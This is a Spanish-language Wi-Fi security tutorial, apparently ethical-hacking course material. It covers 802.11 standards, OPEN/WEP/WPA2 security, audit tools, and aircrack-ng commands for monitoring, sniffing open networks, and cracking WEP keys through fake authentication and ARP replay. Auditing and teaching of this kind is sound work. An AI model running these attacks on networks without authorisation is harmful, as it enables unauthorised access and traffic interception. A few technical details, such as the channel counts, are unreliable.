Seguridad de Redes Wifi

Componentes de una red inalámbrica.

La estructura de una red inalámbrica es bastante sencilla, teniendo 3 componentes principales que describimos a continuación. Normalmente se apoya en una red de Área Local para poder dotarla de una conectividad más extensa.

  • Router

Dispositivo que permite enrutar el tráfico entre distintas redes (Redes empresariales, Redes de Área Extensa), o para conectar las redes domésticas a internet. En redes domésticas se encuentran integrados en los propios puntos de acceso.

  • Punto de Acceso

Dispositivos que presentan la capacidad inalámbrica y de red ethernet y se encargan de brindar acceso Wi-Fi a los clientes inalámbricos e interconectarlos con la red ethernet. En una misma red inalámbrica puede haber varios puntos de acceso.

  • Clientes inalámbricos

Son todos aquellos dispositivos que pueden conectarse a una red inalámbrica a través de los puntos de acceso (Ordenadores, Smartphones, Tablets)

  • Antenas

Son parte esencial del punto de acceso y le ayuda en la tarea de aumentar la cobertura de la señal inalámbrica.

Conceptos generales en hacking ético de entornos inalámbricos.

Existen diversos tipos de wifi, basados cada uno de ellos en un estándar IEEE 802.11. Son los siguientes:

  • Los estándares IEEE 802.11b, IEEE 802.11g e IEEE 802.11n disfrutan de una aceptación internacional debido a que la banda de frecuencia 2,4 GHz está disponible casi universalmente, con una velocidad de hasta 11 Mbit/s, 54 Mbit/s y 300 Mbit/s, respectivamente. El problema es que existen otras tecnologías inalámbricas que también funcionan a una frecuencia de 2,4 GHz, como Bluetooth, por lo que pueden presentar interferencias con la tecnología wifi. Debido a esta problemática, en la versión 1.2 del estándar Bluetooth, se actualizó su especificación para que no existieran interferencias con la utilización simultánea de ambas tecnologías.
  • Desde 2013 existe también el estándar IEEE 802.11ac, conocido como WIFI 5, que opera en la banda de frecuencia 5 GHz y que disfruta de una operatividad con canales relativamente limpios. La banda de 5 GHz ha sido habilitada con posterioridad a las usadas por versiones anteriores y, al no existir otras tecnologías (Bluetooth, microondas, ZigBee, WUSB) que la utilicen, se producen muy pocas interferencias. Su alcance es algo menor que el de los estándares que trabajan a 2,4 GHz (aproximadamente un 10 %), debido a que la frecuencia es mayor (a mayor frecuencia, menor alcance).
  • Publicada en 2019, el estándar IEEE 802.11ax, conocido como WiFi 6 (en bandas de 2.4 GHz y 5 GHz) y también como WiFi 6E (en banda de 6 GHz). Es capaz de operar en las bandas de frecuencia de 2.4 GHz, 5 GHz y 6 GHz. Además, se logra una mejora de velocidad de un 37% más que su antecesor.

Principales diferencias entre las bandas de frecuencia 2,4 GHz y 5GHz.

  • 2,4 GHZ:
CANALES: 14 canales no superpuestos (1-14).

INTERFERENCIAS: Más interferencias.

VELOCIDAD: Menos velocidad de conexión.

RANGO/COBERTURA DE RED: Mayor rango de cobertura.

ESTÁNDAR: IEEE 802.11(B,G,N).

  • 5 GHZ:

CANALES: 25 canales no superpuestos (36-136).

INTERFERENCIAS: Menos interferencias.

VELOCIDAD: Más velocidad de conexión.

RANGO/COBERTURA DE RED: Menor rango de cobertura.

ESTÁNDAR: IEEE 802.11(A,N,AC).


Tipos de redes inalámbricas.

Existen dos grandes tipos de redes Wi-Fi "Redes Adhoc" y "Redes infraestructura". A continuación se detallan las diferencias de cada una de ellas:

  • Redes Adhoc

Dos o más dispositivos se envían los paquetes de datos de forma descentralizada, esperando que lleguen a todos y cada uno de los destinatarios sin que un punto de acceso intermedio se encargue de gestionar todo el tráfico. Todos los dispositivos implicados pactan un canal, un nombre de red, un tipo de seguridad y una clave de seguridad válida.

  • Redes infraestructura

Gobernadas y gestionadas por un dispositivo “Router” que se encarga de “construir” y, opcionalmente, anunciar la existencia de la red wifi con determinados parámetros dados de velocidad, tipo de seguridad, etc. Según los protocolos y tipo de seguridad a las mismas se catalogan en los siguientes tipos de redes:

  • OPEN

Se caracterizan por no presentar ningún tipo de contraseña de autenticación para asociarse a las mismas. Presentan dos importantes problemas de seguridad:

  • Cualquier equipo puede asociarse a las redes.
  • Al no disponer de contraseña el tráfico transmitido no se cifra.

Erróneamente se suele proteger este tipo de redes mediante accesos por portal cautivo, que lo único que realiza es un whitelist de las MAC de los clientes inalámbricos permitidos.

Las redes de tipo OPEN siguen siendo muy utilizadas en las redes de tipo “Invitados”

  • WEP 

Presentado en 1999, el sistema WEP fue pensado para proporcionar una confidencialidad comparable a la de una red tradicional cableada y de ahí viene su nombre, si bien, a partir de 2001, se descubrió que su seguridad era muy frágil. WEP fue desaprobado como un mecanismo de privacidad inalámbrico en 2004.

Incorpora dos niveles de protección: una clave secreta y otra de cifrado. La clave secreta son simplemente 5 o 13 caracteres que se comparten entre el punto de acceso y todos los usuarios de la red inalámbrica. Esta clave se utiliza para generar a partir de ella diferentes claves de cifrado, que son las que realmente cifran de forma única cada paquete de información enviado a la red.

Define un método para crear una clave de cifrado única para cada paquete utilizando los 5 o 13 caracteres de la clave secreta (previamente compartida), más un prefijo pseudoaleatorio que va cambiando para cada paquete.

  • WPA
WPA surgió para corregir las limitaciones del WEP.

Su variante más normal es la WPA-PSK. Usa el sistema PSK, o de clave precompartida. En él, todos los usuarios de la red inalámbrica tienen una misma contraseña wifi que el propio usuario define, de igual manera que pasaba con redes WEP.

También existe una versión WPA empresarial conocida como WPA-Enterprise. Esta ofrece seguridad adicional al obligar a identificarse con un nombre y contraseña en sistemas de autenticación especiales, como RADIUS o 802.1X.

WPA introdujo mejoras de seguridad como el hecho de que los passwords pueden estar comprendidos entre 8 y 63 caracteres de longitud, a diferencia de WEP, cuyo password era de solo 5 o 13 caracteres.

El mayor cambio fue la introducción del TKIP, que varía las claves usadas en la conexión wifi (no confundir con la contraseña wifi) cada cierto tiempo.

Aunque TKIP utiliza internamente el mismo algoritmo que WEP (RC4), construye las claves de forma diferente y más segura con respecto a WEP.

Básicamente, es la nueva manera de construir las claves únicas de cifrado de paquete derivadas de la clave wifi.

TKIP resuelve el problema de reutilización de los vectores de inicialización del cifrado WEP que ya hemos visto previamente. WEP utiliza periódicamente el mismo IV para cifrar los datos. TKIP se basa en patrones menos repetitivos y vectores más largos.
  • WPA2-PSK (Personal)
Hacen uso de clave precompartida para acceder a la red. Al utilizar todos los usuarios la misma clave, en el caso de baja de alguno de los empleados se debería modificar la clave para impedir accesos no deseados.

WPA2 surgió para corregir de manera definitiva las debilidades de los cifrados utilizados en WPA, de manera que finalmente se elimina el uso de RC4. Es el tipo de red más utilizados en la actualidad (WEP y WPA apenas se usan).

Si bien, para su versión WPA2-PSK, se mantiene la longitud entre 8 y 63 caracteres para la contraseña Wi-Fi, el cifrado AES de 128 bits pasa a reemplazar al cifrado inseguro RC4, resolviendo todos los problemas derivados de RC4, que permite adivinar determinados parámetros criptográficos mediante análisis estadístico.

Por lo que respecta a la posibilidad de romper el cifrado, de manera estadística, en estos momentos no se conoce método alguno que lo consiga, por este motivo AES se considera el cifrado más robusto y adecuado para este tipo de redes . Solamente existe la posibilidad de capturar el “4-way handshake”, que se intercambia entre el dispositivo y el punto de acceso como mecanismo de autenticación en una red WPA2 y utilizar este “4-way handshake” para realizar fuerza bruta y obtener la contraseña.
  • WPA2 Enterprise
Las redes de tipo WPA2 Enterprise se caracterizan por que cada usuario se autentica en la red con sus propias credenciales (usuario:password o certificados de cliente) para poder autenticarse en la red. De esta manera no se ha de compartir la misma contraseña de acceso entre todos los usuarios.

Acepta múltiples protocolos de autenticación para la validación de credenciales 802.1.x + EAP y se apoyan en un servidor RADIUS (Normalmente interconectado a un servidor LDAP) para realizar la
autenticación.

Son capaces de proporcionar validación del punto de acceso mediante certificado de Servidor. Sin embargo, para que esta validación sea efectiva, el usuario ha de verificar que la CA con la que se emite el certificado en una “CA de confianza”.

Cada usuario dispone de unas credenciales únicas de uso personal para acceder a la red. Para la autenticación, se utilizan servidores de tipo RADIUS, que validan las credenciales de usuario y permiten o deniegan el acceso a la red está interconectado a un Directorio Activo y, en función de la respuesta, el usuario puede o no tener acceso a los medios. La autenticación mediante credenciales se
puede realizar de dos formas distintas:
  • Autenticación mediante credenciales. Es el tipo de autenticación más usada debido a su facilidad de implementación y gestión. El servidor RADIUS se interconecta con Active Directory. 
  • Autenticación mediante certificados. Es el tipo de autenticación más segura. Dado que es necesario desplegar una infraestructura de PKI su implementación es más costosa y menos utilizada.
Equipamiento necesario.
A la hora de realizar una auditoría Wi-Fi necesitamos disponer de cierto equipamiento específico que nos permita desarrollar las pruebas necesarias en el entorno inalámbrico. De la misma manera, será necesario disponer de ciertas herramientas desarrolladas específicamente para el análisis de este tipo de entornos.

Tarjetas de red
Como os podéis imaginar, será necesario utilizar tarjetas de red que cumplan los siguientes requisitos:
  • Permitan esnifar tráfico (modo Monitor)
  • Permitir la inyección de tráfico. (para poder inyectar tramas de gestión, replay y deautenticación)
  • Permitan configurarse en modo Master (Para establecer un punto de Acceso falso)
  • Soporten frecuencias de transmisión de 2,4 Ghz y 5 Ghz (Dual Band),  si nuestra antena sólo soporta la banda de los 2,4 GHz estaremos dejando de monitorizar todas las comunicaciones que se produjeran en la banda de los 5GHz (que a día de hoy es la gran mayoría)
  • Preferiblemente con antenas extraíbles con la finalidad de poder acoplar antenas externas (Direccionales u Omnidireccionales) las tarjetas Wi-Fi han de permitir la extracción de las antenas para permitir el acoplamiento de antenas más potentes. Preferiblemente la tecnología a utilizar para conectar las tarjetas al equipo del auditor deberá ser USB 3.0, a día de hoy todas las tarjetas que soportan la banda de los 5GHz operan con el estándar USB 3.0. Sin embargo, tarjeta de red más antiguas que sólo soporten la banda de 2,4 GHz pueden que dispongan de USB 2.0. El estándar USB3.0 permite una mayor velocidad de transmisión entre la tarjeta inalámbrica y el equipo de auditoría y, por tanto, mayor capacidad de captura de tramas de red.
Antenas
Se utilizan para aumentar el rango de cobertura cuando de la red WiFi. Existen dos grandes tipos de antena.
  • Direccionales:
Emiten en una única dirección. Pueden tener ángulos de cobertura más amplios o cerrados, dependiendo de la antena. Mayor alcance de señal.

Utilizaremos este tipo de antenas en las siguientes casuísticas:
La red a auditar se encuentra a una distancia que queda fuera de nuestro rango de cobertura o se encuentra en un área restringida.
Desconocemos el nombre de la red a auditar, pero sí el emplazamiento, podemos utilizar las antenas direccionales para monitorizar únicamente las redes que se encuentren en una dirección específica.
  • Omnidireccionales:
Emiten la señal en todas direcciones, Menor alcance de señal.

Por regla general utilizaremos este tipo de antenas dado que son las que vienen incluídas por defecto en las tarjetas Wi-Fi. También cabe la posibilidad de utilizar antenas omnidireccionales más potentes en los siguientes supuestos:
Tenemos un emplazamiento para realizar las pruebas pero la red es muy amplia (varios Puntos de Acceso separados) y queremos abarcar el mayor número de cobertura.
En caso de configurar un Punto de Acceso fraudulento y queremos que tenga la mayor cobertura posible.

Modos de operación de las tarjetas inalámbricas.
Dependiendo de la operativa que se vaya a realizar en cada momento con la tarjeta de red (Monitorizar las comunicaciones, iniciar un Punto de Acceso, conectarse a una red WiFi) habrá que indicar a la tarjeta inalámbrica que inicie un modo específico de operación. A continuación se enumeran los distintos modos en los que se configura la tarjeta para acometer cierto rol:
  • Master
También conocido como modo infraestructura, utilizado para utilizar la tarjeta y el sistema a modo de Punto de acceso. En las pruebas de hacking ético necesitaremos configurar la tarjeta en este modo para
crear un punto de acceso fraudulento. 
  • Managed
También conocido como modo cliente, es el modo en el que se configura la tarjeta para acceder a cualquier red inalámbrica publicada por un AP. En las pruebas de hacking ético necesitaremos configurar la tarjeta en este modo para acceder a una red inalámbrica.
  • Monitor
No se emite ningún tipo de frecuencia, únicamente se monitorizan los canales de la banda en la que nos encontremos. En las pruebas de hacking ético necesitaremos configurar la tarjeta en este modo para poder monitorizar los distintos canales de comunicaciones de las redes inalámbricas.

Aunque la mayoría de las tarjetas inalámbricas de hoy en día permiten este modo de operación es necesario asegurarse que el procesador de la tarjeta permite este modo y el propio driver del Sistema Operativo permite habilitar este modo de operación en la tarjeta. Si la tarjeta inalámbrica o el propio driver no permiten establecer la tarjeta en modo monitor no se podrán capturar paquetes del espacio radioeléctrico.
  • Adhoc
Crea una red multipunto sin necesidad de que exista un punto de acceso en la Red. Normalmente no necesitaremos utilizar este modo de operación durante las pruebas de hacking ético.

Herramientas
Existen numerosas herramientas que nos ayudan a la hora de realizar las pruebas sobre la red inalámbrica. A continuación enumeramos algunas de las más utilizadas en base a la categoría de la herramienta:
  • Escáner de redes Wi-Fi
Software que permite capturar toda la información existente en el espacio radioeléctrico WiFi, enumerando redes detectadas, sus características, si son ad hoc o de infraestructura, si hay clientes conectados, cuántos son y qué dirección MAC tiene cada uno, etc.

NetStumbler (Windows)
Herramienta disponible para Sistemas Operativos Microsoft Windows que permite la monitorización de redes inalámbricas.

Uso mediante interfaz gráfica. Sólo soporta monitorización en la banda de los 2,4 GHz.
Actualmente se encuentra desactualizado. (Última versión en Mayo de 2011 )

Página oficial http://stumbler.net/
 
Kismet / airodump-ng (Linux)
Herramienta disponible para Sistemas Operativos Linux y OSX que permite la monitorización de redes inalámbricas.

Uso mediante consola o interfaz gráfica. Soporta monitorización en la banda de los 2,4 GHz y 5 GHz.

Página oficial https://www.kismetwireless.net/
  • Inyección de paquetes
Software que permite inyectar paquetes en la red, se utiliza para enviar ciertos tipos de tramas, de gestión de red Wi-Fi, con información modificada con la finalidad de alterar la estructura de la red (Modificar la dirección MAC, forzar la desconexión de los clientes, etc).

Para poder utilizarlo de manera correcta necesitamos disponer de una tarjeta WiFi con capacidades de inyección.

Aireplay-ng (Linux)
  • Cracking de contraseñas
Software que permite crackear un handshake capturado para capturado para obtener la contraseña de acceso a la red.

Aircrack-ng / JhonTheRipper / Hashcat (Linux)
  • Punto de Acceso falso
Software que permite realizar el comportamiento de un punto de acceso por software, se utiliza para generar un punto de acceso falso al que se conecten los clientes.

Hostapd-wpe (Linux)
  • Suplantación del portal cautivo
Software que permite emular un portal cautivo de acceso a la red.

Wifiphisher (Linux) (https://github.com/wifiphisher/wifiphisher)
  • Vulnerabilidades del protocolo WPS
Estas herramientas se aprovechan vulnerabilidades de diseño en el protocolo WPS para averiguar el PIN de acceso de WPS a la red utilizado para intercambiar la contraseña WPA entre el Punto de Acceso y un cliente (Autoconfiguración) si recuperamos el PIN, tendremos acceso de lectura a la configuración de WPA/WPA2.

Reaver (Linux)
  • Wardriving
Movimiento que monitoriza las redes existentes en ubicaciones concretas.

Wigle (https://www.wigle.net)
  • airmon-ng
Herramienta disponible para Sistemas Operativos Linux de la suite de aircrack-ng Permite configurar la tarjeta de red en modo monitor de manera simple (No es una herramienta de monitorización) Uso mediante consola

Página oficial https://www.aircrack-ng.org/
  • airodump-ng
Herramienta disponible para Sistemas Operativos Linux de la suite de aircrack-ng. Soporta monitorización en la banda de los 2,4 GHz y 5 GHz.Uso mediante consola

Página oficial https://www.aircrack-ng.org/

Suites de análisis
  • EAP Hammer:
Software todo en uno que permite automatizar un gran número de ataques a redes WiFi.
  • Fake AP.
  • Captive Portal.
  • Downgrade attacks.
  • Capture WPA2 handshake and PMKID.
  • Bruteforce attacks and password spraying.
Airgeddon
Script en bash, herramienta todo en uno que permite automatizar un gran número de ataques a redes WiFi.
  • Fake AP.
  • Captive Portal.
  • Capture WPA2 handshake and PMKID.
  • WEP attacks.
Terminología de las redes Wi-Fi
En una red Wi-Fi existe cierta terminología específica que es necesario conocer, a continuación mostraremos los conceptos necesarios que utilizaremos.
  • Dirección MAC: Dirección de enlace del dispositivo, opera a nivel capa 2 del modelo OSI y es única para cada dispositivo. Identifica de manera inequívoca al dispositivo en la capa de enlace.
  • BSSID: Es el nombre que recibe el identificador único de un dispositivo que ha creado una red Wireless en modo infraestructura. En realidad, se trata de la “dirección MAC” del Punto de acceso.
  • ESSID: ó SSID a secas, es un nombre amigable (máximo 32 caracteres alfanuméricos) asignado a una red wifi para que los usuarios la identifiquen con facilidad y para que dos redes no puedan ser confundidas entre sí cuando conviven en el mismo espacio radioeléctrico.
  • Handshake: Es el procedimiento que se realiza para establecer la comunicación entre el dispositivo Wi-Fi y el Punto de Acceso.
  • Beacon Frames: Contienen toda la información sobre la red inalámbrica y (salvo que se configure lo contrario) son transmitidos periódicamente para anunciar la presencia de la red Wi-Fi e indicar sus características, contienen la siguiente información: Una cabecera MAC address con la dirección MAC del Punto de Acceso que se anuncia (BSSID). Timestamp u hora con la que las estaciones se sincronizan. Beacon Interval o intervalo entre transmisiones. El nombre de la red Wi-Fi (BSSID). Las capacidades de la red, tales como rangos de velocidades y tipos de seguridad soportados.
  • Probe Request: Reciben este nombre los intentos de un dispositivo Wi-Fi (cliente) para averiguar si en un determinado momento existe a su alcance una red Wi-Fi a la que haya accedido previamente. Esta característica se utiliza para que un terminal encuentre una red wifi para la que ya conoce la clave
Análisis y recolección de datos en redes inalámbricas.
  • Monitorización
La monitorización de redes inalámbricas consiste en observar el espectro radioléctrico para poder determinar y caracterizar las distintas señales, de redes Wi-Fi, disponibles en nuestro alcance. Para ello es necesario contar con una serie de requisitos técnicos (dispositivos y herramientas) que trataremos en los siguientes subapartados.

Además, constituye una de las primeras fases de las pruebas de hacking ético en entornos Wi-Fi dado que nos permite conocer las redes que hay a nuestro alrededor así como las características de cada una de ellas. A continuación, se enumeran las características de las redes Wi-Fi que nos interesa conocer para, más tarde, realizar las pruebas que apliquen al tipo de red:
  • SSID: El campo SSID nos indica el nombre de la red. Conocer esta información nos permitiría averiguar cuáles son las redes que nos interesa monitorizar de todas las disponibles en nuestro radio de cobertura. Normalmente los nombres de la red son bastante descriptivos y podríamos averiguar si un determinado nombre de red se corresponde con una red doméstica (por ejemplo si se expone el nombre del ISP o, por el contrario con una red de alguna empresa)
  • BSSID: El campo BSSID indica la dirección MAC del Punto de Acceso que se encuentra publicando cada red. Recordemos que una misma red Wi-Fi puede prestar servicio a través de varios Puntos de Acceso para ampliar su cobertura. En caso de querer monitorizar un punto de acceso concreto, disponer de su BSSID es esencial para poder capturar paquetes de red Wi-Fi desde o hacia ese Punto de Acceso.
  • Canales en los que opera: De la misma manera, dado que el uso de canales Wi-Fi consecutivos puede dar lugar a interferencias, en redes que utilizan varios Puntos de Acceso para prestar cobertura es normal que se utilicen de 3. a 5 canales no consecutivos para que la calidad de la señal no se vea afectada. En este caso, conocer los canales sobre los que opera una determinada red nos permite fijar la señal en ese canal en concreto para la captura de paquetes.
  • Tipo de red Wi-Fi y seguridad: Como hemos visto en apartados anteriores, existen varios tipos de redes Wi-Fi infraestructura (OPEN, WEP, WPA-PSK, WPA/WPA2-Enterprise). El proceso de monitorización nos indica, para cada red disponible, la tipología de red a la que pertenece. Como veremos en los siguientes apartados, esta información nos resultará útil dado que dependiendo del tipo de red utilizada realizaremos una serie de pruebas u otras.
  • Clientes conectados: Por último, es necesario conocer la cantidad de clientes conectados que hay sobre un determinado Punto de Acceso. Existen ciertas técnicas que se aplicarán, preferiblemente, sobre puntos de acceso donde existan más clientes conectados.
Estableciendo la tarjeta de red en modo Monitor.
Dado que aircrack-ng es una de las suites más utilizada para la monitorización de redes Wi-Fi, vamos a detallar el uso de esta suite para monitorizar una red inalámbrica.

Para realizar la monitorización primero se ha de poner la tarjeta en modo monitor y posteriormente utilizar la herramienta de monitorización. En este apartado se indica cómo se realizan ambas operativas.

Antes de proceder con esta operativa es necesario que sepáis que el servicio de gestión de la conexión de red de Linux, Network Manager, suele interferir en la operativa de todas las pruebas que realizaremos sobre las redes Wi-Fi ya que trata de utilizar nuestra tarjeta para utilizarla en modo Managed para tratar de conectarse a las redes inalámbricos como un dispositivo cliente. Para evitar que esto suceda se recomienda parar el servicio NetworkManager hasta que finalicemos las pruebas. se puede utilizar el comando systemctl para parar el servicio NetworkManager de manera temporal
 
$ systemctl stop NetworkManager

Poner la tarjeta en modo monitor.
Aunque en versiones modernas de la suite de aircrack-ng la propia suite realiza el cambio a modo monitor de manera automática, merece la pena conocer cómo realizar esta operativa de manera manual.

Comando iwconfig
Se puede utilizar el comando iwconfig para poner la tarjeta en modo monitor. En el siguiente ejemplo se muestra el comando para iniciar la interfaz inalámbrica "wlan0" en modo monitor:
 
$ iwconfig wlan0 mode Monitor

airmon-ng
En el caso de utilizar airmon-ng te crea una nueva interfaz virtual de tipo "mon". Suponiendo que la interfaz inalámbrica se denomina wlan0:
 
$ airmon-ng start wlan0

Al completarse la acción se comprueba que se ha creado una nueva interfaz llamada wlan0mon. El comando iwconfig indica las propiedades de la tarjeta inalámbrica.
 
$ iwconfig

wlan0mon IEEE 802.11 Mode:Monitor Frequency:2.457 GHz Tx-Power=-2147483648 dBm
Retry short limit:7 RTS thr:off Fragment thr:off
Power Management:on

Monitorizando la red inalámbrica.
Utilizaremos la herramienta airodump para monitorizar las redes inalámbricas a nuestro alcance.

airodump-ng es una herramienta en modo consola que permite monitorizar las redes inalámbricas, su funcionamiento básico es muy simple: airodump-ng nombre_interfaz, por ejemplo, el siguiente comando nos muestra las redes inalámbricas al alcance utilizando la interfaz wlan0:
 
$ airodump-ng wlan0

Además, airodump- ng tiene muchas características que nos permiten filtrar el tipo de tráfico que queremos capturar. Entre los filtros más importantes que podemos establecer se encuentra La posibilidad de fijar un canal o grupo de canales concretos, filtrar por nombre de la red o filtrar por la dirección mac del punto de acceso.

Todas las opciones de filtrado pueden combinarse entre si.
  • Filtrar por rango de frecuencia
En ocasiones es muy útil realizar una captura únicamente sobre un rango de frecuencia específico, por ejemplo si queremos monitorizar dispositivos antiguos conectados en la banda de frecuencia de los 2,4 GHz o , si por el contrario, queremos poner el foco en la banda de los 5GHz de frecuencia. Esta operativa se puede realizar de 2 maneras distintas:

Indicar la banda de frecuencia a monitorizar
Admite establecer la banda de frecuencias a monitorizar con el operador --band:
  • Banda a (5 GHz)
  • Bandas bn (2,4 GHZ)
A continuación se muestra un ejemplo de uso
 
$ airodump-ng wlan0 --band a
$ airodump-ng wlan0 --band bg

Filtrar los canales de cada banda
Otra opción es filtrar por los canales específicos de cada banda haciendo uso del operador -c o --channel, si especificamos más de un canal a monitorizar la tarjeta de red va realizando saltos entre los canales que hemos especificados y en cada salto sólo recopila información de ese canal, por lo que dejas de capturar paquetes de los otros canales monitorizados.. Es importante saber que este operador permite indicar rangos de canales:
  • Canal 36-136 (banda 5 GHz)
  • Canal 1-14 (banda 2,4 GHz)
A continuación se muestra un ejemplo de uso:
 
$ airodump-ng wlan0 --channel 7
$ airodump-ng wlan0 --channel 44
$ airodump-ng wlan0 --channel 1,3,5-,36,48, 56    
$ airodump-ng wlan0 --channel 1-11
$ airodump-ng wlan0 --channel 36-136
$ airodump-ng wlan0 --channel 1-11,36-136
  • Filtrar por nombre de la red
Es posible filtrar la monitorización a un nombre concreto de red o a una red que contenga un determinado patrón (haciendo uso de sintaxis tipo regex). hay que tener en cuenta que normalmente este tipo de filtrado se puede realizar para filtrar una red en concreto dentro de un canal o para ver todos los canales en los que opera un determinado nombre de red.

Se utiliza el operador --essid para filtrar por un nombre de red en concreto. A continuación se muestran varios ejemplos:
 
$ airodump-ng wlan0 –c 1-14,36-156 -essid Wi-Fi-Hotel
$ airodump-ng wlan0 –c 44 -essid Invitados

Se utiliza el operador --essid-regex para filtrar por un nombre de red que contenga un determinado patrón en el nombre. Los patrones se especifican mediante sintaxis tipo regex. A continuación se muestran varios ejemplos:
 
$ airodump-ng wlan0 –c 1-14,36-156 -essid-regex *Hotel*
$ airodump-ng wlan0 –c 44 -essid-regex *Invitados*
  • Filtrar por dirección MAC del Punto de Acceso
En caso en que existan muchos Puntos de Acceso operando en la misma red y que muchos de estos puntos de acceso operen en el mismo canal, puede ser conveniente filtrar la captura sobre el que más paquetes de datos transmite (Columna #Data del output de airodump-ng). Esta operación se realiza con el operador --bssid. A continuación se muestra un ejemplo de uso:
 
$ airodump-ng wlan0 --channel 36 --bssid AA:BB:CC:DD:EE:FF
  • Filtrar por tipo de cifrado
Por último, también es posible filtrar basándonos en el tipo de cifrado con el operador --encrypt y especificando los sistemas de cifrado:
  • OPN
  • WEP
  • WPA1
  • WPA2
A continuación se muestran varios ejemplos de uso:
 
$ airodump-ng wlan0 --encrypt OPN --band bga
$ airodump-ng wlan0 --encrypt WEP --band bga
$ airodump-ng wlan0 --encrypt WPA1 --band bga
$ airodump-ng wlan0 --encrypt WPA2 --band bga

Para acceder a la ayuda de airodump y ver más opciones de configuración de la herramienta se puede utilizar el operador --help.
 
$ airodump-ng --help

Ataques a redes tipo OPEN.
Como vimos en anteriores subapartados, la principal característica de las redes tipo OPEN es que no establecen ninguna contraseña para que los dispositivos clientes se conecten a la red. De esta manera todos los datos transmitidos por la red que no utilicen protocolos cifrados (HTTP, FTP, telnet) quedarán expuestos.

Usos
Normalmente las redes redes de tipo OPEN se utilizan para dotar de conectividad a invitados externos a la organización. Hotspots en restaurantes, bares u hoteles. Dado que se consideran redes poco confiables dado que están abiertas a cualquier individuo, se utilizan únicamente para el acceso a internet.

Problemas Asociados
Por sí mismas no establecen ningún tipo de autenticación. No ofrecen ningún tipo de cifrado del canal con lo que los datos se transmiten en claro. Son redes consideradas como poco confiables y que no presentan un mecanismo de validación del punto de acceso. Los clientes suelen tener visibilidad entre ellos pudiendo sufrir ataques de otro equipo de la red. Pueden ser utilizadas para realizar ataques hacia el exterior, quedando registradas como originarias del ataque. Si la red no se encuentra correctamente segmentada y aislada de otras redes, es posible que se produzcan fugas de información e incluso accesos a otras redes.

Tipos de ataque
Existen distintos ataques a los que están expuestas las redes tipo OPEN, a continuación se detallan los más comunes.
  • Acceso no autorizado
Quizá este ataque sea el más sencillo de realizar dado que simplemente hemos de conectarnos a la red. Una vez conectados a la red ya se nos abren otras vías de ataque como puede ser el compromiso de otro equipo conectado a la misma red.

Para conectarnos a una red OPEN podemos realizarlo desde el propio gestor de red de nuestro Sistema Operativo.

También podemos conectarnos a la red desde la consola con el comando iwconfig para acceder a la red y el comando dhclient para obtener una dirección válida de la red.
 
$ iwconfig wlan0 mode Managed essid 'nombre_de_red'
$ dhclient -v wlan0
  • Ausencia de cifrado
En este tipo de ataque primero hay que establecer la tarjeta en modo monitor para escuchar en el canal en el que opera la red tipo OPEN y establecer un filtro para que sólo monitorice las tramas que se transmitan al nombre de la red que deseamos (De esta manera no nos llegarán tramas de otras redes que operen en el mismo canal)
 
$ airodump-ng wlan0 --encrypt OPN --band bga -c 100 --essid 'nombre_de_red'

Después abrimos wireshark para observar todos los paquetes que se transmiten por la red, veremos tanto las tramas de gestión y los beacons de los dispositivos cliente como el tráfico que se transmita por la red, como es de suponer sólo podremos obtener el tráfico que no se transmita por protocolos cifrados (HTTP, FTP, telnet)

Otra opción consiste en realizar la captura de airodump indicándole que todo el tráfico que recoja lo guarde en un fichero.pcap, mediante el operador -w y más tarde abrir ese fichero pacp con wireshark para buscar datos que se hubieran transmitido en claro. A continuación se muestra cómo se puede guardar la información capturada a un fichero:
 
$ airodump-ng wlan0 --encrypt OPN --band bga -c 100 --essid 'nombre_red' -w nombre-fichero

Ataques a redes tipo WEP.
El uso de este tipo de redes se considera actualmente obsoleto, si bien es cierto que existen ciertas casuísticas de dispositivos que por su antigüedad siguen trabajando con este tipo de red Wi-Fi.

Usos
Dada la antigüedad de este tipo de redes, normalmente es difícil encontrarte con redes de
tipo WEP. Sin embargo hoy en día aún siguen siendo utilizadas en los siguientes supuestos: Sistemas SCADA o equipamiento antiguo (Fábricas, sistemas portuarios, etc.), Impresoras antiguas con conectividad WiFi

Problemas Asociados
Utiliza el algoritmo RC4, el cual es vulnerable a ataques de tipo estadístico. La longitud de la clave de acceso es entre 5 y 13 caracteres. Los clientes suelen tener visibilidad entre ellos pudiendo sufrir ataques de otro equipo de la red. Si la red no se encuentra correctamente segmentada y aislada de otras redes, es posible que se produzcan fugas de información e incluso accesos a otras redes.

Tipos de ataque
Existen distintos ataques a los que están expuestas las redes tipo WEP. Aunque el uso de este tipo de redes es bastante inusual, el ataque más común consiste en capturar tráfico de la red para tratar de obtener la clave de acceso mediante un proceso posterior de cracking.

Dado que la principal debilidad de este protocolo radica en el uso del algoritmo RC4, que presenta vulnerabilidades basadas en ataques estadístico a los vectores de inicialización del algoritmo, de esta manera, a mayor número de vectores de inicialización capturados, mayor probabilidad de éxito del ataque.

Este tipo de ataque se puede realizar con clientes conectados a la red, o sin ningún cliente. A continuación se detallan ambos procesos:
  • Captura de proceso de autenticación y averiguación de contraseña (Clientes conectados)
Dado que toda la base del proceso de ataque sobre este tipo de redes se basa en la obtención de vectores de inicialización propagados en las tramas de gestión, el primer paso consiste en monitorizar y capturar todos los datos que se transmitan en la red de tipo WEP y redirigirlos a un fichero.
 
$ airodump-ng –c 11 --bssid AA:BB:CC:DD:EE:FF -w fichero_captura

Para poder conseguir capturar estos vectores de inicialización de manera más rápida se procede a inyectar ciertas tramas de gestión que fuerzan al Punto de Acceso a generar estos vectores. Como os podéis imaginar, para realizar este proceso necesitaremos que nuestra tarjeta de red disponga de capacidades de inyección de paquetes.

Para empezar se generan tramas de autenticación falsas. Para ello necesitamos conocer los siguientes datos:
  • Dirección MAC del Punto de Acceso o BSSID (operador -a)
  • Dirección MAC del cliente (operador -h)
Abrimos una nueva ventana del terminal y utilizaremos aireplay con el tipo de ataque "fakeauth" que se corresponde con el tipo de ataque -1, el comando resultante sería similar al siguiente:
 
$ aireplay-ng -1 0 -a AA:BB:CC:DD:EE:FF -h 00:11:22:33:44:55 wlan0

Una vez se están produciendo los ataques de tipo fake-auth, abrimos otro terminal para realizar un replay de los paquetes ARP que capturemos del cliente, de esta manera se aumenta aún más la generación de los vectores de inicialización. como podéis observar el comando a utilizar es muy similar al anterior, pero en este caso se indica que el ataque es de tipo "arpreplay", que se corresponde con el tipo de ataque -3.
 
$ aireplay-ng -3 0 -a AA:BB:CC:DD:EE:FF -h 00:11:22:33:44:55 wlan0

Una vez que se está forzando la generación de estos vectores de inicialización mediante la falsificación de tramas de gestión podemos abrir otro terminal para para utilizar aircrack-ng para que realice el proceso de averiguación de la contraseña en base a los vectores de inicialización capturados
 
$ aircrack-ng fichero_captura.cap
